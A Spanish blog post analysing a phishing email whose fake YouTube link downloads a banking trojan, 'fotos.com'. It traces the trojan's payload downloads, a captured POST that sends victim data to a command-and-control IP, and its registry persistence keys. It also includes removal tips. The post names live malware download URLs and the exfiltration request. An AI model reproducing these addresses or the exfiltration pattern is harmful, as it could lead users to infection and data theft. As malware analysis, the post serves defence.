Otro mail interesante "Encontrado o Corpo da ex-amante do Goleiro Bruno do Flamento.‏"

Como tengo muuuuuchos contactos que me quieren y se preocupan por mi falta de interacción con la sociedad, recibo varios mails al día, de los cuales la mayoria son cadenas/spam/phishing, y solamente leo los últimos xD.
Hoy me encontré con uno que me invita a ver un video de youtube sobre el cuerpo de alguna ex-amante de "Bruno do Flamento", que al parecer se trata de un caso de homicidio donde se investiga a un jugador del club Flamengo llamado Bruno. Los brasileros tienen un interesante índice de casos de phising xD.
El link a youtube es: http://www.youtube.com/watch?v=SroGd-1ahG0&feature=related-0.48874 realmente es el link a un video que no está disponible (seguramente porque NUNCA existió tal video), pero a decir verdad cuando uno hace click sobre el supuesto link, este no es mas que texto con un enlace a la dirección "http://bit.ly/byg70N?0.48874", sisi, uno de esos enlaces anonimizados xD. El link nos "invita" a descargar un archivo llamado "fotos.com" de http://www.oabpr.com.br/imagens/noticia/g/fotos. com, sisi.... ni se esfuerzan para ocultar la extensión xD.
Un sitio un tanto... extraño diría... diseñado por los chicos de Webk2 (cuyo sitio está terriblemente bloqueado por los navegadores...). El sitio oabpr.com.br adolece de MUCHAS vulnerabilidades a SIMPLE vista, y es el lugar ideal para cultivar porquerias, como están haciendo los chicos de "Hacked by Vrs-hCk - c0li.m0de.0n.".

El sitio está... increiblemente comprometido, al punto que da a pensar que fue creado con esa idea, si bien parece tener contenido relacionado (es un sitio de los abogados de brazil, que loco, no?). Entre las cosas que hay: un shell en php que permite hacer prácticamente cualquier cosa desde el servidor, scripts para enviar spam..., varios archivos .exe y .com para descargar e infectarse..., etc, y un aparente gestor de logs xD. MUY MUY comprometido...

 En fin..., ahora un poco del funcionamiento de nuestro fotos.com:

1-Lo primero que aparentemente hace es descargarse un archivo llamado sidebar.exe (algun tipo de barra para IE posiblemente) de otro posible sitio comprometido: www.avinnovo.com/modules/mod_archive/tmpl/sidebr. exe.

2-Luego comienza a descargar imágenes,alguno que otro .sys/.exe/.pri/.ico, muchas de hecho, del sitio sambananas.dk/pics/train/ (dk resulta ser el TLD correspondiente a Dinamarca...). Gracioso que todas las imágenes que descarga hacen referencia a entidades bancarias... e íconos de navegadores web como IE y FF.

3-Una vez que descarga todas sus cosas y las acomoda en "Arquivos de progrmas" y directorios locales del usuario, ahora, haciendo uso de http://meuip.datahouse.com.br/, el bichito captura la ip publica del infectado :D. Y aca viene algo divertido, luego de capturar mi IP, se conecta sin resolución de nombres a una dirección específica (aparentemente otro sitio brasilero comprometido, que mas bien parece un fake porque no tiene un nombre de dominio propio...) a la cual envía los siguientes datos (POST /ajax/indx.php HTTP/1.0):

URLENCODED:

from=%5B%2B1%5D+INFECT+%3D%29&FromMail=infects%40rbd%2Ecom&destino=fcorp2009%40gmail%2Ecom&assunto=%5B%2B1+Infect%5D%3A+JUAN%2DAA57CF7254+Vem+q+vem+INFECTs%21+%3A%29&mensagem=Computer+Name%3A+JUAN%2DAA57CF7254%0DStatus+GBPLUGIN%3A+Plugin+de+Seguran%E7a+n%E3o+Instalado%2E%0DDate%3A+15%2F07%2F2010+%2D+Atual%0DTime%3A+00%3A14%3A52+%2D+Atual%0DIP%3A+201%2E253%2E149%2E60%0DMAC+ADR%3A+00%2D0C%2D29%2DD5%2DC0%2D72%0DLocaliza%E7%E3o%3A+Espa%F1a%0D%5Bx%5D+Url%27s+Visitadas+%5Bx%5D%0D%0A%0D%0Ahttp%3A%2F%2Fchat%2Earnet%2Ecom%2Ear%2F%0D%0A%5C%5C10%2E0%2E0%2E2%5CC%0D%0Ahttp%3A%2F%2Fwww%2Emegaupload%2Ecom%2F%0D%0Ahttp%3A%2F%2Fwww%2Eamericaenvivo%2Ecom%2Ear%2F%0D%0A&

URLDECODED:

from=[+1] INFECT =)&FromMail=infects@rbd.com&destino=fcorp2009@gmail.com&assunto=[+1 Infect]: JUAN-AA57CF7254 Vem q vem INFECTs! :)&mensagem=Computer Name: JUAN-AA57CF7254 Status GBPLUGIN: Plugin de Segurança não Instalado. Date: 15/07/2010 - Atual Time: 00:14:52 - Atual IP: 201.253.149.XX MAC ADR: 00-0C-29-D5-C0-72 Localização: España [x] Url's Visitadas [x]  http://chat.arnet.com.ar/ \\10.0.0.2\C http://www.megaupload.com/ http://www.americaenvivo.com.ar/ &

JA!, mirá que bien, saben que a veces paseo por el chat de arnet, bajo contenido GPL de megaupload y miro américa xD. Además de mi IP, máscara de red y mi hermoso nombre xD. También dice (según mi PRECARIO portugues) que el plugin de seguridad a sido instalado mmm... y que soy de españa, algo obvio... joder!

Aparentemente son datos para enviar por email, por las direcciones de origen y destino involucradas...

HOLA, ahora estoy oficialmente infectado xD.

Lo gracioso, es que  http://201.2.106.69/ajax/indx. php, si, nótese inDX, sin E, no existe en el servidor (o responde con 404 a modo de despistar...), si en cambio existe index.php (que da un error al conectarse al servidor mysql aparentemente).

En fin... son muchos los bancos que se encuentran representados por las imágenes que se descargan, evidentemente destinadas a phishing...

También aparece un tercero dominio involucrado..., hum.au.dk, otro sitio de dinamarca posiblemente comprometido, ya que aparentemente se trata de una organización de bien xD. También el dominio http://cluster003.ovh.net/, aparentemente un servidor de mail "multipropósito", voy a ver mas sobre este, parece interesante.

Bueno, para permanecer atento, el bichito registra un par de claves en el registro de windows (el viejo truco xD):

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"ctmon2"="C:\\Arquivos de programas\\Sidebar\\new.exe"

"ctmon32"="C:\\Arquivos de programas\\Sidebar\\java32.exe"

 [HKEY_USERS\S-1-5-21-527237240-1958367476-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Run]

"msnmsr"="C:\\Arquivos de programas\\Sidebar\\new.exe"

"ctmon32"="C:\\Arquivos de programas\\Sidebar\\java32.exe"

[HKEY_USERS\S-1-5-21-527237240-1958367476-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Run]

"msnmsr"="C:\\Arquivos de programas\\Sidebar\\new.exe"

"ctmon32"="C:\\Arquivos de programas\\Sidebar\\java32.exe"

y ahora?

Suponiendo que este sea el único método de supervivencia que utiliza, su eliminación es simple, basta con buscarlo en el registro y eliminar todas las claves de ese tipo, remover por completo el directorio "Arquivos de programas" (salvo que tengas el sistema operativo en portugues jajajaja), y eliminar todo el contenido temporal de internet (y pasar el antivirus xD, si es que todavía funciona).

Se extendió demasiado esto jaja, solo espero que alguien lo lea y comente al respecto. Me gustaría poder hacer un análisis un poco mas forense del tema pero ni el conocimiento ni el tiempo me lo permiten, al menos por ahora.

No puse muchos nombres de dominio, IPs e imágenes porque... bueno, no quiero romperle las bolas a nadie, solamente mostrar lo que está pasando.

Está claro que el phishing está en su pico mas alto de productividad... no noté cambio alguno en mis browsers FF 3.5.10 e IE 6.0, pero posiblemente un análisis mas detallado de los archivos descargados sea interesante, después de todo uno de los datos enviados por el bichito es una confirmacion de actualización/infección...

En fin, aca corto, cualquier comentario es bien venido :P.